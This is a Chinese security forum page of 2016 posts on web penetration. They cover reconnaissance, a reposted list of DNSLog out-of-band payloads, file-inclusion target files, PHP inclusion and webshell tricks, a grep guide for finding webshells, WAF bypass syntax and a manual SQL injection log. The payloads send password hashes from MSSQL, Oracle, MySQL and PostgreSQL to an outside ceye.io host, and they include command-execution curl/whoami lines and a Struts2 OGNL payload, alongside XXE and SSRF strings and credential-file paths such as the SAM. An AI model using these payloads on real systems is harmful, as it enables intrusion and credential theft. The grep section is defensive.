WEB踩点

小六儿~ 发表了文章 • 0 个评论 • 364 次浏览 • 2016-09-22 14:46 • 来自相关话题

 对于白帽子来说,在开始渗透之前,必须先完成信息收集,那么信息收集的第一步是什么呢?就是WEB踩点。  
一、什么是踩点
踩点:就是对指定目标进行系统的网站信息收集,攻击者将尽可能多的收集目标单位的安全情况的方方面面。

二、为什么要踩点  
知己知彼,百战不殆。  
每个人都有自己的习惯、思维方式,发掘他的习惯、思维方式,就是他的弱点。踩点是最辛苦的任务之一,它也是最枯燥的,同样也是最重要的任务之一。

三、WEB踩点的常见手段
 
0x01  网站共享主机(旁注)  
旁注是网络上比较流行的一种入侵方法,在字面上解释就是"从旁注入",利用同一主机上面不同网站的漏洞得到 webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。  
网站共享主机漏洞是更为严谨的学术叫法。    

- 关于c段旁注    
旁注与C段嗅探的意义,旁注的意思就是从同台服务器上的其他网站入手,提权,然后把服务器端了,就自然把那个网站端了。C段嗅探,每个IP有 ABCD 四个段,举个例子192.168.0.1,A段就是192,B段是168,C段0,D 段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255 中的一台服务器,然后利用工具嗅探拿下该服务。     

- 旁站入侵和C段入侵哪个更理想
旁站入侵更为理想。C段嗅探还涉及到提权,ARP。还要等待管理员登陆,才能抓取到密码。

- 常用工具  
k8_c段旁注查询工具

0x02  WHOIS服务
利用whois服务,可以获取与目标相关的具体信息,包括注册人邮箱,IP地址,公司DNS主机名以及地址和电话号码等信息。
 
- whois信息一定可以查到所需要信息的吗?如果查不到是什么原因?  
不一定哦,稍微有安全意识的注册人会设置隐私保护
- 常用工具  
站长之家,爱站网

0x03  二级域名
- 搜索引擎 site指令    
百度,谷歌,必应
- dns区域传送/域名暴力枚举    
fierce 是使用多种技术来扫描目标主机IP地址和主机名的一个DNS服务枚举工具。    
工作原理:先通过查询本地DNS服务器来查询目标DNS服务器,然后使用目标DNS服务器来查找子域名。    
具体命令:fierce -dns ccb.com -threads(线程数) 100

0x04 CDN后的真实IP
 
- CDN概述    
CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。其目的是使用户可就近取得所需内容,解决Internet网络拥挤的状况,% 查看全部
 对于白帽子来说,在开始渗透之前,必须先完成信息收集,那么信息收集的第一步是什么呢?就是WEB踩点。  
一、什么是踩点
踩点:就是对指定目标进行系统的网站信息收集,攻击者将尽可能多的收集目标单位的安全情况的方方面面。

二、为什么要踩点  
知己知彼,百战不殆。  
每个人都有自己的习惯、思维方式,发掘他的习惯、思维方式,就是他的弱点。踩点是最辛苦的任务之一,它也是最枯燥的,同样也是最重要的任务之一。

三、WEB踩点的常见手段
 
0x01  网站共享主机(旁注)  
旁注是网络上比较流行的一种入侵方法,在字面上解释就是"从旁注入",利用同一主机上面不同网站的漏洞得到 webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。  
网站共享主机漏洞是更为严谨的学术叫法。    

- 关于c段旁注    
旁注与C段嗅探的意义,旁注的意思就是从同台服务器上的其他网站入手,提权,然后把服务器端了,就自然把那个网站端了。C段嗅探,每个IP有 ABCD 四个段,举个例子192.168.0.1,A段就是192,B段是168,C段0,D 段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255 中的一台服务器,然后利用工具嗅探拿下该服务。     

- 旁站入侵和C段入侵哪个更理想
旁站入侵更为理想。C段嗅探还涉及到提权,ARP。还要等待管理员登陆,才能抓取到密码。

- 常用工具  
k8_c段旁注查询工具

0x02  WHOIS服务
利用whois服务,可以获取与目标相关的具体信息,包括注册人邮箱,IP地址,公司DNS主机名以及地址和电话号码等信息。
 
- whois信息一定可以查到所需要信息的吗?如果查不到是什么原因?  
不一定哦,稍微有安全意识的注册人会设置隐私保护
- 常用工具  
站长之家,爱站网

0x03  二级域名
- 搜索引擎 site指令    
百度,谷歌,必应
- dns区域传送/域名暴力枚举    
fierce 是使用多种技术来扫描目标主机IP地址和主机名的一个DNS服务枚举工具。    
工作原理:先通过查询本地DNS服务器来查询目标DNS服务器,然后使用目标DNS服务器来查找子域名。    
具体命令:fierce -dns ccb.com -threads(线程数) 100

0x04 CDN后的真实IP
 
- CDN概述    
CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。其目的是使用户可就近取得所需内容,解决Internet网络拥挤的状况,%

WEB踩点

小六儿~ 发表了文章 • 0 个评论 • 344 次浏览 • 2016-09-22 14:44 • 来自相关话题

利用DNSLog判断漏洞是否存在的常用payload

Mosuan 发表了文章 • 5 个评论 • 911 次浏览 • 2016-09-18 20:49 • 来自相关话题

为什么要用dns判断?没回显。
 0x00 Command Execution
i. *nix:curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
ii. windowsping %USERNAME%.b182oj.ceye.io  
0x01 SQL Injection  
From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.  
i. SQL ServerDECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');  
ii. OracleSELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;  
iii. MySQLSELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));  
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function(); 
0x02 XML Entity Injection<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>  
 
0x03 Others
i. Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}

xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
  
ii. FFMpeg
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST   


iii. Weblogicxxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search  


iv. ImageMagick
push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context  

v. Resinxxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf  

vi. Discuzhttp://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo  
转载:http://ceye.io/payloads 查看全部
为什么要用dns判断?没回显。
 0x00 Command Execution
i. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`  
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows
ping %USERNAME%.b182oj.ceye.io
  
0x01 SQL Injection  
From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.  
i. SQL Server
DECLARE @host varchar(1024);  
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
 
ii. Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');  
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
 
iii. MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
  
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;  
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();
 
0x02 XML Entity Injection
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
 
 
0x03 Others
i. Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}  

xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

  
ii. FFMpeg
#EXT-X-MEDIA-SEQUENCE:0  
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST
   


iii. Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 
 


iv. ImageMagick
push graphic-context  
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context
 

v. Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf 
 

vi. Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo 
 
转载:http://ceye.io/payloads

【文件包含or下载】常见文件列表

Mosuan 发表了文章 • 2 个评论 • 569 次浏览 • 2016-09-18 00:03 • 来自相关话题

WINDOWS下:

c:/boot.ini //查看系统版本
c:/windows/php.ini //php配置信息
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

------------------------------------------------------------
 LUNIX/UNIX 下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略 查看全部
WINDOWS下:

c:/boot.ini //查看系统版本
c:/windows/php.ini //php配置信息
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

------------------------------------------------------------
 LUNIX/UNIX 下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略

浅谈几个古老的PHP漏洞

pygain 发表了文章 • 6 个评论 • 551 次浏览 • 2016-09-12 21:00 • 来自相关话题

1.PHP文件包含漏洞
网站会过滤我们上传的可执行小马(.php),可以先上传一个正常的PHP文件名为test,在文件内写入:
<?php
$test=$_GET['C']
include($test)
?>
将小马作为xiaoma.txt/jpg
在地址栏执行:/text/index.php?C=xiaoma.txt  文件就可以作为PHP文件执行。用菜刀即可
 
2.远程文件包含
远程服务器要先开启这项服务





将xiaoma.txt 放在我们的另一台服务器上
也是将有包含函数的常规PHP上传到远程服务器上。
在地址栏键入:h啊ttp://xxxxxx.com/test.php?C=自己的服务器下的木马.txt
 
3.包含日志漏洞
使网页报错,并将错误信息和一句话木马一起放入日志当中
例如:index.php s=my/show/id/ {eval/($_POST['C'])}, 此时会将错误信息和木马一起传入日志但是此时却是.log文件
为了执行这个错误文件键入:
index.php s=my/show/id/\..\temp\logs\16_09_12.log(极大可能是)  可以执行这个错误文件
 
4.命令注入漏洞(command Injection)
通过特殊符号,将数据提交至web应用程序
将包含下列代码的正常php文件上传至服务器
<?php
$cmd=$_GET['C'];
echo "<pre>";//转码
$system($)//win系统的命令执行函数 linux为 echo shell_exec($cmd);
?>
在地址栏执行:test.php?C=ipconfig/net user 123 456 //建后面
 
5.变量覆盖漏洞
开发者对变量的初始化使得我们可重新对网页进行变量赋值
一个PHP网页内的变量改为$arr=$_GET['C']  地址栏 admin.php>C=123 .此时网页的变量就变为123
 
6.下载漏洞 
有极少的网站拥有down.php?fileup=文件目录 我们可以对此进行改变而控制。
  查看全部
1.PHP文件包含漏洞
网站会过滤我们上传的可执行小马(.php),可以先上传一个正常的PHP文件名为test,在文件内写入:
<?php
$test=$_GET['C']
include($test)
?>
将小马作为xiaoma.txt/jpg
在地址栏执行:/text/index.php?C=xiaoma.txt  文件就可以作为PHP文件执行。用菜刀即可
 
2.远程文件包含
远程服务器要先开启这项服务

QQ截图20160912201024.png

将xiaoma.txt 放在我们的另一台服务器上
也是将有包含函数的常规PHP上传到远程服务器上。
在地址栏键入:h啊ttp://xxxxxx.com/test.php?C=自己的服务器下的木马.txt
 
3.包含日志漏洞
使网页报错,并将错误信息和一句话木马一起放入日志当中
例如:index.php s=my/show/id/ {eval/($_POST['C'])}, 此时会将错误信息和木马一起传入日志但是此时却是.log文件
为了执行这个错误文件键入:
index.php s=my/show/id/\..\temp\logs\16_09_12.log(极大可能是)  可以执行这个错误文件
 
4.命令注入漏洞(command Injection)
通过特殊符号,将数据提交至web应用程序
将包含下列代码的正常php文件上传至服务器
<?php
$cmd=$_GET['C'];
echo "<pre>";//转码
$system($)//win系统的命令执行函数 linux为 echo shell_exec($cmd);
?>
在地址栏执行:test.php?C=ipconfig/net user 123 456 //建后面
 
5.变量覆盖漏洞
开发者对变量的初始化使得我们可重新对网页进行变量赋值
一个PHP网页内的变量改为$arr=$_GET['C']  地址栏 admin.php>C=123 .此时网页的变量就变为123
 
6.下载漏洞 
有极少的网站拥有down.php?fileup=文件目录 我们可以对此进行改变而控制。
 

利用grep查找webshell freebuf

zksmile 发表了文章 • 4 个评论 • 441 次浏览 • 2016-09-12 11:28 • 来自相关话题

利用grep命令我们可以查找常见的漏洞、webshell和其他恶意文件。本文使用的grep版本为2.9,如果你使用一个低于2.5.4的grep,那本片文章中的一些命令可能无法正常工作。可以用grep -v或grep -version确定一下版本。你也可以使用grep –help查看更多信息。如下图:




发现漏洞的常见方法:

为什么大多数web应用程序都会发现一些不安全的代码,就是因为调用了一些不安全的函数,而又未进行过滤。例如:命令注入或远程代码执行,可以执行客户端传递的参数。这里常常会用到shell_exec函数。我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:
grep -Rn “shell_exec *( ” /var/www





上图中,我们可以看到可能存在漏洞的函数行和路径。

另一个例子:include require include_once和require_once都是可能存在问题的地方,它可能会造成本地文件包含漏洞。我们可以使用grep查找出现该函数的地方然后进行测试判断,如下:grep -Rn “include *(” /var/www
grep -Rn “require *(” /var/www
grep -Rn “include_once *(” /var/www
grep -Rn “require_once *(” /var/www





以上两个简单的例子可以做为白盒挖掘漏洞的参考,下面介绍一下查找webshell和其他恶意文件的方法:

常见的webshell都会包含一些功能,如执行命令、下载文件、编辑文件、反弹连接等行为。除了常见的shell_exec,base64_decode和eval,还有其他的一些特征码,比如phpspy2006中会包含“Version:2006,proxycontents”,phpspy2008中会包含“phpspypass,goaction(‘backconnect”等等。还有以下一些常见的特征:phpinfo
system
php_uname
chmod fopen
flclose
readfile
edoced_46esab
passthru
我们可以用grep搜索包含这些函数的文件,如下:grep -Rn “shell_exec *(” /var/www
grep -Rn “base64_decode *(” /var/www
grep -Rn “phpinfo *(” /var/www
grep -Rn “system *(” /var/www
grep -Rn “php_uname *(” /var/www
grep -Rn “chmod *(” /var/www
grep -Rn “fopen *(” /var/www
grep -Rn “fclose *(” /var/www
grep -Rn “readfile *(” /var/www
grep -Rn “edoced_46esab *(” /var/www
grep -Rn “eval *(” /var/www
grep -Rn “passthru *(” /var/www










当然这些可以合并成一条命令,如下:
grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(” /var/www 查看全部
利用grep命令我们可以查找常见的漏洞、webshell和其他恶意文件。本文使用的grep版本为2.9,如果你使用一个低于2.5.4的grep,那本片文章中的一些命令可能无法正常工作。可以用grep -v或grep -version确定一下版本。你也可以使用grep –help查看更多信息。如下图:
1.png

发现漏洞的常见方法:

为什么大多数web应用程序都会发现一些不安全的代码,就是因为调用了一些不安全的函数,而又未进行过滤。例如:命令注入或远程代码执行,可以执行客户端传递的参数。这里常常会用到shell_exec函数。我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:
grep -Rn “shell_exec *( ” /var/www

2.png

上图中,我们可以看到可能存在漏洞的函数行和路径。

另一个例子:include require include_once和require_once都是可能存在问题的地方,它可能会造成本地文件包含漏洞。我们可以使用grep查找出现该函数的地方然后进行测试判断,如下:
grep -Rn “include *(” /var/www
grep -Rn “require *(” /var/www
grep -Rn “include_once *(” /var/www
grep -Rn “require_once *(” /var/www


3.png

以上两个简单的例子可以做为白盒挖掘漏洞的参考,下面介绍一下查找webshell和其他恶意文件的方法:

常见的webshell都会包含一些功能,如执行命令、下载文件、编辑文件、反弹连接等行为。除了常见的shell_exec,base64_decode和eval,还有其他的一些特征码,比如phpspy2006中会包含“Version:2006,proxycontents”,phpspy2008中会包含“phpspypass,goaction(‘backconnect”等等。还有以下一些常见的特征:
phpinfo
system
php_uname
chmod fopen
flclose
readfile
edoced_46esab
passthru

我们可以用grep搜索包含这些函数的文件,如下:
grep -Rn “shell_exec *(” /var/www
grep -Rn “base64_decode *(” /var/www
grep -Rn “phpinfo *(” /var/www
grep -Rn “system *(” /var/www
grep -Rn “php_uname *(” /var/www
grep -Rn “chmod *(” /var/www
grep -Rn “fopen *(” /var/www
grep -Rn “fclose *(” /var/www
grep -Rn “readfile *(” /var/www
grep -Rn “edoced_46esab *(” /var/www
grep -Rn “eval *(” /var/www
grep -Rn “passthru *(” /var/www


4.png


5.png

当然这些可以合并成一条命令,如下:
grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(” /var/www

【转载】waf绕过

糖醋黄瓜 发表了文章 • 5 个评论 • 383 次浏览 • 2016-09-09 19:33 • 来自相关话题

0x01: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`() 
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec)
一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; 
+----+  
| id |  
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)
usage : where  id ='0'`'xxxxcomment on.

0x02:神奇的- + .

mysql> select id from qs_admins;  
+----+  
| id | 
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ...    就是这样连起来过)

0x03: @

mysql> select@^1.from qs_admins;  
+------|+  
| @^1. |  
+------|+  
| NULL |  
+------|+
这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

0x04:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  
+------|+  
| test |  
+------|+  
| -1   |  
+------|+  
1 row in set (0.00 sec)

0x05:/![>5000]/ 新构造  版本号(这个可能有些过时了。)

mysql> /\!40000select\/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)
 
大家有时间去试试,我也没试过估计有点用 查看全部
0x01: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`() 
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec)
一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; 
+----+  
| id |  
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)
usage : where  id ='0'`'xxxxcomment on.

0x02:神奇的- + .

mysql> select id from qs_admins;  
+----+  
| id | 
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ...    就是这样连起来过)

0x03: @

mysql> select@^1.from qs_admins;  
+------|+  
| @^1. |  
+------|+  
| NULL |  
+------|+
这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

0x04:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  
+------|+  
| test |  
+------|+  
| -1   |  
+------|+  
1 row in set (0.00 sec)

0x05:/![>5000]/ 新构造  版本号(这个可能有些过时了。)

mysql> /\!40000select\/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)
 
大家有时间去试试,我也没试过估计有点用

记一次Mysql手工注入(过滤逗号)

Mosuan 发表了文章 • 9 个评论 • 925 次浏览 • 2016-09-09 15:14 • 来自相关话题

#先感谢下@莲藕炖猪蹄和@redfree。姿势不在多,只要你的姿势正确欢迎来给我普及新知识。绝对虚心求教。

再就是标题党一回,今天碰到一个注入,过滤了逗号,sqlmap并没有跑出来,习惯性装逼手注一下。

过滤逗号的情况下布尔型注入可以用substring这个函数,正常用法substring(@@version,1,1)=5,猜@@version的第一位是5。

但是这里过滤了逗号,前段时间@莲藕炖猪蹄 大牛刚给我普及了一下,substring不用逗号也可以猜解的用法。

substring(database() from 1) 这样是猜解完整的数据库名字。

简单用本地数据库演示下。 
 




一开始length(database())得到9



接下来猜数据库名称 substring(database() from 9) 这样猜解数据库名称最后一个字符并没有猜出最后一位是什么字符…这特么就很尴尬了....刚开始只知道过滤逗号,当时就想到了应该是还过滤了什么关键词....

怎么判断过滤了什么字符?简单判断:length下当前的注入的语句,如果过滤了注入语句中的某个关键词肯定返回false。已知DATA SIZE为3453为True。这里证明没有过滤什么东西...

这个时候@redfree那边说他注入出来了...语法是一样的…我擦....
检查下python代码,redfree说他那边加了headers,如果不加headers就返回False...
